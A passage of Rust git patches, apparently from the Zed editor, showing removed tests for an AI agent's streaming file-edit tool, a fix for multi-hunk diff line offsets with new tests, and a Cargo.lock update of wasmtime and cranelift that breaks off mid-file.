assert!(!diff.has_revealed_range(cx)); - }); - - // Stream first content chunk - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\n" - })); - cx.run_until_parked(); - - // Diff should now have revealed ranges showing the new content - diff.read_with(cx, |diff, cx| { - assert!(diff.has_revealed_range(cx)); - }); - - // Send final input - sender.send_full(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\nnew line 2\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new line 1\nnew line 2\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); - - // Diff is finalized after completion - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - } - - #[gpui::test] - async fn test_streaming_overwrite_content_streamed(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Verify buffer still has old content (no content partial yet) - let buffer = project.update(cx, |project, cx| { - let path = project.find_project_path("root/file.txt", cx).unwrap(); - project.open_buffer(path, cx) - }); - let buffer = buffer.await.unwrap(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "old line 1\nold line 2\nold line 3\n" - ); - - // First content 
partial replaces old content - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\n" - })); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "new line 1\n"); - - // Subsequent content partials append - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\nnew line 2\n" - })); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "new line 1\nnew line 2\n" - ); - - // Send final input with complete content - sender.send_full(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write", - "content": "new line 1\nnew line 2\nnew line 3\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new line 1\nnew line 2\nnew line 3\n"); - assert_eq!(*old_text, "old line 1\nold line 2\nold line 3\n"); - } - - #[gpui::test] - async fn test_streaming_edit_json_fixer_escape_corruption(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello\nworld\nfoo\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Simulate JSON fixer producing a literal backslash when the LLM - // stream cuts in the middle of a \n escape sequence. 
- // The old_text "hello\nworld" would be streamed as: - // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) - // partial 2: old_text = "hello\nworld" (fixer corrected the escape) - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello\\"}] - })); - cx.run_until_parked(); - - // Now the fixer corrects it to the real newline. - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello\nworld"}] - })); - cx.run_until_parked(); - - // Send final. - sender.send_full(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "HELLO\nWORLD\nfoo\n"); - } - - #[gpui::test] - async fn test_streaming_final_input_stringified_edits_succeeds(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "hello\nworld\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_full(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "edit", - "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "HELLO\nWORLD\n"); - } - - // Verifies that after streaming_edit_file_tool edits a file, the action log - // reports changed buffers so that the Accept All / Reject All review UI appears. - #[gpui::test] - async fn test_streaming_edit_file_tool_registers_changed_buffers(cx: &mut TestAppContext) { - let (tool, _project, action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (event_stream, _rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit lines".to_string(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }]), - }), - event_stream, - cx, - ) - }); - - let result = task.await; - assert!(result.is_ok(), "edit should succeed: {:?}", result.err()); - - cx.run_until_parked(); - - let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); - assert!( - !changed.is_empty(), - "action_log.changed_buffers() should be non-empty after streaming edit, - but no changed buffers were found - Accept All / Reject All will not appear" - ); - } - - // Same test but for Write mode (overwrite entire file). 
- #[gpui::test] - async fn test_streaming_edit_file_tool_write_mode_registers_changed_buffers( - cx: &mut TestAppContext, - ) { - let (tool, _project, action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "original content"})).await; - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (event_stream, _rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Overwrite file".to_string(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("completely new content".into()), - edits: None, - }), - event_stream, - cx, - ) - }); - - let result = task.await; - assert!(result.is_ok(), "write should succeed: {:?}", result.err()); - - cx.run_until_parked(); - - let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); - assert!( - !changed.is_empty(), - "action_log.changed_buffers() should be non-empty after streaming write, \ - but no changed buffers were found \u{2014} Accept All / Reject All will not appear" - ); - } - - #[gpui::test] - async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( - cx: &mut TestAppContext, - ) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "old_content"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "write" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "write", - "content": "new_content" - })); - cx.run_until_parked(); - - 
sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "write", - "content": "new_content", - "path": "root" - })); - cx.run_until_parked(); - - // Send final. - sender.send_full(json!({ - "display_description": "Overwrite file", - "mode": "write", - "content": "new_content", - "path": "root/file.txt" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "new_content"); - } - - #[gpui::test] - async fn test_streaming_edit_file_tool_fields_out_of_order_in_edit_mode( - cx: &mut TestAppContext, - ) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "old_content"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit" - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content"}] - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content", "new_text": "new_content"}] - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content", "new_text": "new_content"}], - "path": "root" - })); - cx.run_until_parked(); - - // Send final. - sender.send_full(json!({ - "display_description": "Overwrite file", - "mode": "edit", - "edits": [{"old_text": "old_content", "new_text": "new_content"}], - "path": "root/file.txt" - })); - cx.run_until_parked(); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "new_content"); - } - - #[gpui::test] - async fn test_streaming_edit_partial_last_line(cx: &mut TestAppContext) { - let file_content = indoc::indoc! {r#" - fn on_query_change(&mut self, cx: &mut Context) { - self.filter(cx); - } - - - - fn render_search(&self, cx: &mut Context) -> Div { - div() - } - "#} - .to_string(); - - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.rs": file_content})).await; - - // The model sends old_text with a PARTIAL last line. - let old_text = "}\n\n\n\nfn render_search"; - let new_text = "}\n\nfn render_search"; - - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_full(json!({ - "display_description": "Remove extra blank lines", - "path": "root/file.rs", - "mode": "edit", - "edits": [{"old_text": old_text, "new_text": new_text}] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { - new_text: final_text, - .. - } = result.unwrap() - else { - panic!("expected success"); - }; - - // The edit should reduce 3 blank lines to 1 blank line before - // fn render_search, without duplicating the function signature. 
- let expected = file_content.replace("}\n\n\n\nfn render_search", "}\n\nfn render_search"); - pretty_assertions::assert_eq!( - final_text, - expected, - "Edit should only remove blank lines before render_search" - ); - } - - #[gpui::test] - async fn test_streaming_edit_preserves_blank_line_after_trailing_newline_replacement( - cx: &mut TestAppContext, - ) { - let file_content = "before\ntarget\n\nafter\n"; - let old_text = "target\n"; - let new_text = "one\ntwo\ntarget\n"; - let expected = "before\none\ntwo\ntarget\n\nafter\n"; - - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.rs": file_content})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - sender.send_full(json!({ - "display_description": "description", - "path": "root/file.rs", - "mode": "edit", - "edits": [{"old_text": old_text, "new_text": new_text}] - })); - - let result = task.await; - - let StreamingEditFileToolOutput::Success { - new_text: final_text, - .. 
- } = result.unwrap() - else { - panic!("expected success"); - }; - - pretty_assertions::assert_eq!( - final_text, - expected, - "Edit should preserve a single blank line before test_after" - ); - } - - #[gpui::test] - async fn test_streaming_reject_created_file_deletes_it(cx: &mut TestAppContext) { - let (tool, _project, action_log, fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - // Create a new file via the streaming edit file tool - let (event_stream, _rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Create new file".into(), - path: "root/dir/new_file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("Hello, World!".into()), - edits: None, - }), - event_stream, - cx, - ) - }); - let result = task.await; - assert!(result.is_ok(), "create should succeed: {:?}", result.err()); - cx.run_until_parked(); - - assert!( - fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, - "file should exist after creation" - ); - - // Reject all edits — this should delete the newly created file - let changed = action_log.read_with(cx, |log, cx| log.changed_buffers(cx)); - assert!( - !changed.is_empty(), - "action_log should track the created file as changed" - ); - - action_log - .update(cx, |log, cx| log.reject_all_edits(None, cx)) - .await; - cx.run_until_parked(); - - assert!( - !fs.is_file(path!("/root/dir/new_file.txt").as_ref()).await, - "file should be deleted after rejecting creation, but an empty file was left behind" - ); - } - - #[test] - fn test_input_deserializes_double_encoded_fields() { - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": 
"root/file.txt", - "mode": "\"edit\"", - "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" - })) - .expect("input should deserialize"); - - assert!(matches!(input.mode, StreamingEditFileMode::Edit)); - let edits = input.edits.expect("edits should deserialize"); - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text, "hello\nworld"); - assert_eq!(edits[0].new_text, "HELLO\nWORLD"); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"" - })) - .expect("input should deserialize"); - assert!(input.edits.is_none()); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"", - "edits": null - })) - .expect("input should deserialize"); - assert!(input.edits.is_none()); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": "\"edit\"", - "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" - })) - .expect("input should deserialize"); - - assert!(matches!(input.mode, Some(StreamingEditFileMode::Edit))); - let edits = input.edits.expect("edits should deserialize"); - assert_eq!(edits.len(), 1); - assert_eq!(edits[0].old_text.as_deref(), Some("hello\nworld")); - assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt" - })) - .expect("input should deserialize"); - assert!(input.mode.is_none()); - assert!(input.edits.is_none()); - - let input = serde_json::from_value::(json!({ - "display_description": "Edit", - "path": "root/file.txt", - "mode": null, - "edits": null - })) - .expect("input should deserialize"); - assert!(input.mode.is_none()); - assert!(input.edits.is_none()); - } - - async fn setup_test_with_fs( - cx: &mut TestAppContext, - fs: Arc, - worktree_paths: &[&std::path::Path], - ) 
-> ( - Arc, - Entity, - Entity, - Arc, - Entity, - ) { - let project = Project::test(fs.clone(), worktree_paths.iter().copied(), cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log.clone(), - language_registry, - )); - (tool, project, action_log, fs, thread) - } - - async fn setup_test( - cx: &mut TestAppContext, - initial_tree: serde_json::Value, - ) -> ( - Arc, - Entity, - Entity, - Arc, - Entity, - ) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", initial_tree).await; - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await - } - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - SettingsStore::update_global(cx, |store: &mut SettingsStore, cx| { - store.update_user_settings(cx, |settings| { - settings - .project - .all_languages - .defaults - .ensure_final_newline_on_save = Some(false); - }); - }); - }); - } -} From 2532f204fd9430b35b93cf4ea5606554e22699e2 Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Mon, 4 May 2026 13:01:12 +0300 Subject: [PATCH 152/231] zeta_prompt: Fix multy-hunk diff application (#55613) Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/zeta_prompt/src/udiff.rs | 58 +++++++++++++++++++++++++++++++-- 1 file changed, 56 insertions(+), 2 deletions(-) diff --git a/crates/zeta_prompt/src/udiff.rs b/crates/zeta_prompt/src/udiff.rs index ab0837b9f54ac0..eee1e65931c280 100644 --- a/crates/zeta_prompt/src/udiff.rs +++ b/crates/zeta_prompt/src/udiff.rs @@ -415,6 +415,7 @@ pub fn apply_diff_to_string_with_hunk_offset( let mut text = text.to_string(); let mut first_hunk_offset = None; + let mut line_delta = 0i64; while let Some(event) = diff.next().context("Failed to parse diff")? { match event { @@ -424,9 +425,12 @@ pub fn apply_diff_to_string_with_hunk_offset( status: _, } => { let candidates = find_context_candidates(&text, &mut hunk); + let adjusted_start_line = hunk + .start_line + .and_then(|start_line| u32::try_from(start_line as i64 + line_delta).ok()); let hunk_offset = - disambiguate_by_line_number(&candidates, hunk.start_line, &|offset| { + disambiguate_by_line_number(&candidates, adjusted_start_line, &|offset| { text[..offset].matches('\n').count() as u32 }) .ok_or_else(|| anyhow!("couldn't resolve hunk"))?; @@ -435,12 +439,19 @@ pub fn apply_diff_to_string_with_hunk_offset( first_hunk_offset = Some(hunk_offset); } + let mut hunk_line_delta = 0i64; for edit in hunk.edits.iter().rev() { let range = (hunk_offset + edit.range.start)..(hunk_offset + edit.range.end); + let deleted_lines = text[range.clone()].matches('\n').count() as i64; + let inserted_lines = edit.text.matches('\n').count() as i64; text.replace_range(range, &edit.text); + hunk_line_delta += inserted_lines - deleted_lines; } + line_delta += hunk_line_delta; + } + DiffEvent::FileEnd { .. } => { + line_delta = 0; } - DiffEvent::FileEnd { .. } => {} } } @@ -1315,6 +1326,49 @@ mod tests { assert_eq!(result, "hello\nworld"); } + #[test] + fn test_apply_diff_to_string_adjusts_line_numbers_after_prior_hunks() { + let text = "first\nremove first\nfirst\nsame\nremove\nsame\nsame\nremove\nsame\n"; + let diff = indoc! 
{" + --- a/file.txt + +++ b/file.txt + @@ -1,3 +1,2 @@ + first + -remove first + first + @@ -4,3 +3,2 @@ + same + -remove + same + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!(result, "first\nfirst\nsame\nsame\nsame\nremove\nsame\n"); + } + + #[test] + fn test_apply_diff_to_string_adjusts_line_numbers_after_prior_insertion_hunks() { + let text = "first\nfirst\nsame\nremove\nsame\nsame\nremove\nsame\n"; + let diff = indoc! {" + --- a/file.txt + +++ b/file.txt + @@ -1,2 +1,3 @@ + first + +inserted + first + @@ -6,3 +7,2 @@ + same + -remove + same + "}; + + let result = apply_diff_to_string(diff, text).unwrap(); + assert_eq!( + result, + "first\ninserted\nfirst\nsame\nremove\nsame\nsame\nsame\n" + ); + } + #[test] fn test_find_context_candidates_no_false_positive_mid_text() { // The stripped fallback must only match at the end of text, not in From 51d56377924aa7d9e69dfc806e2096ae87dba016 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 4 May 2026 12:14:25 +0200 Subject: [PATCH 153/231] Update wasmtime to 36.0.8 (#55611) Pulls in latest cranelift and wasmtime to address security and bug fixes (to hopefully address some panics on windows in wasmtime) Release Notes: - N/A --- Cargo.lock | 156 ++++++++++++++++++++++++++--------------------------- 1 file changed, 78 insertions(+), 78 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 406d9f450bd6d8..1dde4ac88509ad 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3944,36 +3944,36 @@ dependencies = [ [[package]] name = "cranelift-assembler-x64" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8056d63fef9a6f88a1e7aae52bb08fcf48de8866d514c0dc52feb15975f5db5" +checksum = "cb1ffe339f197d6645b4d3037edf67c13cd3aa8871f29c2c9c046c729c1b9a17" dependencies = [ "cranelift-assembler-x64-meta", ] [[package]] name = "cranelift-assembler-x64-meta" -version = "0.123.7" +version = "0.123.8" source = 
"registry+https://github.com/rust-lang/crates.io-index" -checksum = "57d063b40884a0d733223a45c5de1155395af4393cf7f900d5be8e2cbc094015" +checksum = "1e81a21df73d1b12ed19eba481c08de8891e179e1870ed28d6e397f7746108f5" dependencies = [ "cranelift-srcgen", ] [[package]] name = "cranelift-bforest" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c3add2881bae2d55cd7162906988dd70053cb7ece865ad793a6754b04d47df6" +checksum = "3cf917d0180c15c945c13c8dde615d32a015769513b29158f728311d85a8f80d" dependencies = [ "cranelift-entity", ] [[package]] name = "cranelift-bitset" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dd73e32bc1ea4bddc4c770760c66fa24b2890991b0561af554219e603fcd7c34" +checksum = "a6f4e1af2df00798c2895d228bb53d65c5aa09acace8525096f0b53830ffe42c" dependencies = [ "serde", "serde_derive", @@ -3981,9 +3981,9 @@ dependencies = [ [[package]] name = "cranelift-codegen" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e1da85f2636fe28244848861d1ed0f8dccdc6e98fc5db31aa5eb8878e7ff617" +checksum = "4e3a5d7300e4b44933dcf2947399945abe3f30f92c789b496ad72949e3ee15a6" dependencies = [ "bumpalo", "cranelift-assembler-x64", @@ -4011,9 +4011,9 @@ dependencies = [ [[package]] name = "cranelift-codegen-meta" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee3c8aba9d89832df27364b2e79dc2fe288daf4bd6c7347829e7f3f258ea5650" +checksum = "becdb5c3111800d7f8e666fe5f35693bfc77de4401bfcaea19815caf7c482fb9" dependencies = [ "cranelift-assembler-x64-meta", "cranelift-codegen-shared", @@ -4024,24 +4024,24 @@ dependencies = [ [[package]] name = "cranelift-codegen-shared" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"ac9a9b09fe107fef6377caed20614586124184cffccb73611312ceb922a917e6" +checksum = "d8fa77efffa12934971f757e154b16dd5e369a7f388a0f3adff74aadfd4c5a1d" [[package]] name = "cranelift-control" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "50aef001c7ad250d5fdda2c7481cbfcabe6435c66106adf5760dcb9fb9a8ede4" +checksum = "62441d3aae3372381e03a121880482158ce90ca3bc2a56607cc122ee07536fe4" dependencies = [ "arbitrary", ] [[package]] name = "cranelift-entity" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf3c84656a010df2b5afaedcbbbd94f1efe175b55e29864df7b99e64bfa40d56" +checksum = "7bdc9832a010e0d411439aa016e1664dd23ca5c8953bf26b90fe34ad4b76822d" dependencies = [ "cranelift-bitset", "serde", @@ -4050,9 +4050,9 @@ dependencies = [ [[package]] name = "cranelift-frontend" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6aa1d2006915cddb63705db46dcfb8637fe08f91d26fbe59680d7257ec39d609" +checksum = "9530b689b7c3accdbb32263ca318e19ab3bcf616d3a160c8456537c99b4c565b" dependencies = [ "cranelift-codegen", "log", @@ -4062,15 +4062,15 @@ dependencies = [ [[package]] name = "cranelift-isle" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e4fecbcbb81273f9aff4559e26fc341f42663da420cca5ac84b34e74e9267e0" +checksum = "3fcd3258a4d87376f2681c72269a42009286a3d3707b2af4024ba5b3750ad477" [[package]] name = "cranelift-native" -version = "0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "976a3d85f197a56ae34ee4d5a5e469855ac52804a09a513d0562d425da0ff56e" +checksum = "642c5703a22b58abccbf46f46c0dae65f0535bbe725beec70527a1ffcbbc1d34" dependencies = [ "cranelift-codegen", "libc", @@ -4079,9 +4079,9 @@ dependencies = [ [[package]] name = "cranelift-srcgen" -version = 
"0.123.7" +version = "0.123.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37fbd4aefce642145491ff862d2054a71b63d2d97b8dd1e280c9fdaf399598b7" +checksum = "d200dcd5a37de108ec1329e0ba924e2badd2c0ef2343c338310135159ae454e2" [[package]] name = "crash-context" @@ -8583,7 +8583,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.6.1", + "socket2 0.5.10", "tokio", "tower-service", "tracing", @@ -8601,7 +8601,7 @@ dependencies = [ "js-sys", "log", "wasm-bindgen", - "windows-core 0.62.2", + "windows-core 0.56.0", ] [[package]] @@ -13710,7 +13710,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "22505a5c94da8e3b7c2996394d1c933236c4d743e81a410bcca4e6989fc066a4" dependencies = [ "bytes 1.11.1", - "heck 0.5.0", + "heck 0.4.1", "itertools 0.11.0", "log", "multimap", @@ -13860,9 +13860,9 @@ checksum = "bd348ff538bc9caeda7ee8cad2d1d48236a1f443c1fa3913c6a02fe0043b1dd3" [[package]] name = "pulley-interpreter" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a078b4bdfd275fadeefc4f9ae3675ee5af302e69497da439956dd05257858970" +checksum = "35eaba3163b9faf1d707f0704a7370bfdbe73622c766acdaf1fa4addb87510de" dependencies = [ "cranelift-bitset", "log", @@ -13872,9 +13872,9 @@ dependencies = [ [[package]] name = "pulley-macros" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dac91999883fd00b900eb5377be403c5cb8b93e10efcb571bf66454c2d9f231" +checksum = "ac294897a29ce07919714f9f25c11a819d75759d47eb9f3273845ffea5a5760d" dependencies = [ "proc-macro2", "quote", @@ -13977,7 +13977,7 @@ dependencies = [ "quinn-udp", "rustc-hash 2.1.1", "rustls 0.23.33", - "socket2 0.6.1", + "socket2 0.5.10", "thiserror 2.0.17", "tokio", "tracing", @@ -14014,7 +14014,7 @@ dependencies = [ "cfg_aliases 0.2.1", "libc", "once_cell", - "socket2 0.6.1", + "socket2 0.5.10", "tracing", 
"windows-sys 0.60.2", ] @@ -16527,7 +16527,7 @@ version = "0.8.9" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c1c97747dbf44bb1ca44a561ece23508e99cb592e862f22222dcf42f51d1e451" dependencies = [ - "heck 0.5.0", + "heck 0.4.1", "proc-macro2", "quote", "syn 2.0.117", @@ -19919,9 +19919,9 @@ dependencies = [ [[package]] name = "wasmtime" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b80d5ba38b9b00f60a0665e07dde38e91d884d4a78cd61d777c8cf081a1267c1" +checksum = "2060d93be880840d764ab537464b916e22c07758ac5d43e5f07cc86fec6d1bec" dependencies = [ "addr2line", "anyhow", @@ -19980,9 +19980,9 @@ dependencies = [ [[package]] name = "wasmtime-environ" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "44a45d60dea98308decb71a9f7bb35a629696d1fbf7127dbfde42cbc64b8fa33" +checksum = "902f991ca8c2e5abc03119eb5d7f7f57da1b7c2123addb8214b49c188737711e" dependencies = [ "anyhow", "cpp_demangle", @@ -20007,9 +20007,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-asm-macros" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dd014b4001b6da03d79062d9ad5ec98fa62e34d50e30e46298545282cc2957e4" +checksum = "b02cec619b54ce7652d1d7676718a42ccf5f16b2fb23c27cd6e3c307bc93907a" dependencies = [ "cfg-if", ] @@ -20026,9 +20026,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-macro" -version = "36.0.7" +version = "36.0.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0f2942aa5d44b02061e0c6ab71b23090cf3b300b4519e3b80776ac38edde2e65" +checksum = "fad82a87bc24b6014c5271e1558e466fd029dcc80896f143b3693394a162f3be" dependencies = [ "anyhow", "proc-macro2", @@ -20041,15 +20041,15 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-util" -version = "36.0.7" +version = "36.0.8" source = 
